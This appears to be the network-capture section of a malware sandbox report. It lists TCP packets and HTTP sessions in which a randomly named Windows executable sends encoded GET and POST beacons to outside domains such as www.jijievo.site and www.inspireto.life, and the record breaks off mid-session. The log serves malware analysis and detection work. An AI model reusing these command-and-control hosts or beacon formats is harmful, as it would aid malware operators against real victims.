                                                                                                                            Dec 3, 2024 14:39:10.678435087 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.678453922 CET4992280192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:10.678617001 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.678639889 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.678652048 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.678687096 CET4992280192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:10.798011065 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.798116922 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.798162937 CET4992280192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:10.802231073 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.856605053 CET4992280192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:10.869693995 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.869782925 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.869921923 CET4992280192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:10.872411013 CET8049922162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:10.872467041 CET4992280192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:10.904742002 CET4992280192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:11.923203945 CET4992880192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:12.043222904 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:12.043318033 CET4992880192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:12.053571939 CET4992880192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:12.173818111 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.325678110 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.325736046 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.325747013 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.325865984 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.325866938 CET4992880192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:13.325892925 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.325917006 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.325927973 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.325939894 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.325952053 CET4992880192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:13.325977087 CET4992880192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:13.326571941 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.326729059 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.327213049 CET4992880192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:13.447828054 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.447870970 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.448005915 CET4992880192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:13.452145100 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.452200890 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.452409029 CET4992880192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:39:13.527012110 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.527049065 CET8049928162.0.213.94192.168.2.6
                                                                                                                            Dec 3, 2024 14:39:13.527193069 CET4992880192.168.2.6162.0.213.94
                                                                                                                            Dec 3, 2024 14:40:31.309021950 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:31.309164047 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:31.318845987 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:31.438909054 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.049078941 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.049181938 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.049192905 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.049406052 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.049417019 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.049520969 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.049520969 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.049722910 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.050127983 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.093997955 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.094085932 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.094099998 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.094321012 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.094337940 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.094564915 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.169816017 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.169924021 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.170099020 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.259377003 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.259444952 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.262559891 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.263525009 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.263644934 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.263758898 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.271935940 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.275257111 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.275273085 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.276551962 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.283368111 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.283498049 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.284567118 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.291815042 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.291934967 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.294907093 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.304116964 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.304214001 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.304230928 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.306546926 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.306638956 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.306752920 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.315056086 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.315110922 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.315295935 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.323822021 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.323904037 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.326448917 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.331830025 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.332024097 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.332901001 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.340406895 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.346383095 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.382664919 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.382801056 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.382936954 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.469927073 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.469990969 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.470089912 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.472573996 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.472657919 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.472697973 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.478281975 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.478297949 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.478393078 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.482134104 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:33.482208014 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.486618042 CET5004280192.168.2.6208.91.197.27
                                                                                                                            Dec 3, 2024 14:40:33.606595993 CET8050042208.91.197.27192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:39.012428045 CET5004380192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:39.132500887 CET8050043154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:39.136679888 CET5004380192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:39.150326014 CET5004380192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:39.270284891 CET8050043154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:40.658339024 CET5004380192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:40.778726101 CET8050043154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:40.778975964 CET5004380192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:41.673847914 CET5004480192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:41.793785095 CET8050044154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:41.793870926 CET5004480192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:41.813071012 CET5004480192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:41.933096886 CET8050044154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:43.325961113 CET5004480192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:43.420348883 CET8050044154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:43.420403957 CET5004480192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:43.420455933 CET8050044154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:43.420495987 CET5004480192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:43.445851088 CET8050044154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:43.445899010 CET5004480192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:44.346091986 CET5004580192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:44.466334105 CET8050045154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:44.472353935 CET5004580192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:44.484373093 CET5004580192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:44.604563951 CET8050045154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:44.604603052 CET8050045154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:45.997652054 CET5004580192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:46.073420048 CET8050045154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:46.073476076 CET5004580192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:46.073512077 CET8050045154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:46.073559999 CET5004580192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:46.117906094 CET8050045154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:46.117983103 CET5004580192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:47.018361092 CET5004680192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:47.138374090 CET8050046154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:47.142456055 CET5004680192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:47.154345989 CET5004680192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:47.274384022 CET8050046154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:48.765579939 CET8050046154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:48.765628099 CET8050046154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:48.765759945 CET5004680192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:48.768718958 CET5004680192.168.2.6154.23.184.95
                                                                                                                            Dec 3, 2024 14:40:48.888838053 CET8050046154.23.184.95192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:54.468717098 CET5004780192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:40:54.588978052 CET8050047172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:54.589262009 CET5004780192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:40:54.605845928 CET5004780192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:40:54.725935936 CET8050047172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:55.729502916 CET8050047172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:55.729569912 CET8050047172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:55.729618073 CET5004780192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:40:56.108855009 CET5004780192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:40:57.146363020 CET5004880192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:40:57.266696930 CET8050048172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:57.268487930 CET5004880192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:40:57.284466982 CET5004880192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:40:57.404906034 CET8050048172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:58.365456104 CET8050048172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:58.365497112 CET8050048172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:40:58.365545034 CET5004880192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:40:58.796545982 CET5004880192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:40:59.881216049 CET5004980192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:41:00.001303911 CET8050049172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:00.001403093 CET5004980192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:41:00.045715094 CET5004980192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:41:00.166124105 CET8050049172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:00.166204929 CET8050049172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:01.169348955 CET8050049172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:01.169373035 CET8050049172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:01.169543028 CET5004980192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:41:01.560434103 CET5004980192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:41:02.583662033 CET5005080192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:41:02.704215050 CET8050050172.104.18.233192.168.2.6
                                                                                                                            Dec 3, 2024 14:41:02.706536055 CET5005080192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:41:02.758177042 CET5005080192.168.2.6172.104.18.233
                                                                                                                            Dec 3, 2024 14:41:02.878212929 CET8050050172.104.18.233192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49830 | 13.248.169.48 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:38:31.478219032 CET | 551 | OUT | GET /ni8v/?u6nP_F48=E6dmM5lVsU5dMvoO4DByNQl1po9CAiKqwP/M9Lkf/Pz1vXYNvQEcepUiklJu8ucCjCBb2PxhMpGrlWRQjEXW3F39dXh33B934veeKulAqM3yo8/KKg/OIuvEV/M85G2BQAfVVnY=&F8S0G=ul80rPhxFlR8lH HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.aiactor.xyz
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Dec 3, 2024 14:38:32.568223953 CET | 421 | IN | HTTP/1.1 200 OK
                                                                                                                            Server: openresty
                                                                                                                            Date: Tue, 03 Dec 2024 13:38:32 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 281
                                                                                                                            Connection: close
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?u6nP_F48=E6dmM5lVsU5dMvoO4DByNQl1po9CAiKqwP/M9Lkf/Pz1vXYNvQEcepUiklJu8ucCjCBb2PxhMpGrlWRQjEXW3F39dXh33B934veeKulAqM3yo8/KKg/OIuvEV/M85G2BQAfVVnY=&F8S0G=ul80rPhxFlR8lH"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49870 | 154.90.35.240 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:38:48.544800997 CET | 803 | OUT | POST /k6jo/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.jijievo.site
                                                                                                                            Content-Length: 213
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.jijievo.site
                                                                                                                            Referer: http://www.jijievo.site/k6jo/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Ascii: u6nP_F48=t0IhHSZr23HWJwZxB/Lk1sQYmF44Bei8baRzf4GROk0uj8f2X1+oDrZ9ziW0kITWVi8cKCkYOfWe2zlaUxsBaza3j0Ci/5kMseqW2ec970X1NoJHuWFft7eEaNkSl1hCkNywqictAK9p50c0noIsc28qhR+ncYHZkk4FvWnAKiH2949359IdKp+xADFPR9TcxOlhlpGCqSBO


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49876 | 154.90.35.240 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:38:51.216475010 CET | 827 | OUT | POST /k6jo/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.jijievo.site
                                                                                                                            Content-Length: 237
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.jijievo.site
                                                                                                                            Referer: http://www.jijievo.site/k6jo/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Ascii: u6nP_F48=t0IhHSZr23HWJQpxacjkkcQf6V44Uui4badzf9iBPSkukZ72YRKoCrZ97CWxqoTdVi4uKAwYOfSe2yVaVC0CIzaprUCkxZkMseqW2eIH71z1NYZHu3FcrLeDbNkSh1hGkNzfqn94AIFp50s0n98jV28z8B/pQL3d+C9KmnfPKjiQ4OgtlOI+Y5ezABd9RdT2zOdh3+Kllmkt5ozwCu5iV/tmbvNGtuUALw==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49883 | 154.90.35.240 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:38:53.897022009 CET | 1840 | OUT | POST /k6jo/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.jijievo.site
                                                                                                                            Content-Length: 1249
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.jijievo.site
                                                                                                                            Referer: http://www.jijievo.site/k6jo/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49889 | 154.90.35.240 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:38:56.553672075 CET | 552 | OUT | GET /k6jo/?u6nP_F48=g2gBEi9B+HDFGx1wG+72kN8Yj19AUdr4Nr1Jd72ZJlQgpbXPbifaD6lB1zmlmZG8AmkyaCU7LvK0zzlsdiU5EFaXnjyK5oQQkYGW08c3lB7eL51xgHFAptm5WP0FkXlczfO1jHA=&F8S0G=ul80rPhxFlR8lH HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.jijievo.site
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Dec 3, 2024 14:38:58.419655085 CET | 197 | IN | HTTP/1.1 200 OK
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Date: Tue, 03 Dec 2024 13:38:58 GMT
                                                                                                                            Server: nginx
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            Content-Length: 24
                                                                                                                            Connection: close
                                                                                                                            Data Ascii: Unable to get connection


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49907 | 162.0.213.94 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:39:04.053203106 CET | 809 | OUT | POST /odi0/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.inspireto.life
                                                                                                                            Content-Length: 213
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.inspireto.life
                                                                                                                            Referer: http://www.inspireto.life/odi0/
                                                                                                                            User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; GT-N7100 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                                                            Data Ascii: u6nP_F48=N87iulGflmr5mqk6n8fsnpPIN1tIl6Dlil6OZchQ2/Hgf/uo0sJwNmjZa8a1iOWTZPNDYxniOlwUDXXis1X4X516Fk20TUV7s4MFjnQ4bV2lGQeEephqy7mP4Cd7Wx1kKWQlL0+rjftdSUtL4sMEPC/0bChoFP/GMrYdneY7LEqrS/WzZFhoRdmoQ02yBweLYHSSowvmqk3Y
Dec 3, 2024 14:39:05.373219967 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                            Date: Tue, 03 Dec 2024 13:39:05 GMT
                                                                                                                            Server: Apache
                                                                                                                            Content-Length: 16052
                                                                                                                            Connection: close
                                                                                                                            Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49916 | 162.0.213.94 | 80 | 5868 | C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:39:06.715790987 CET | 833 | OUT | POST /odi0/ HTTP/1.1
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                                            Host: www.inspireto.life
                                                                                                                            Content-Length: 237
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Connection: close
                                                                                                                            Origin: http://www.inspireto.life
                                                                                                                            Referer: http://www.inspireto.life/odi0/
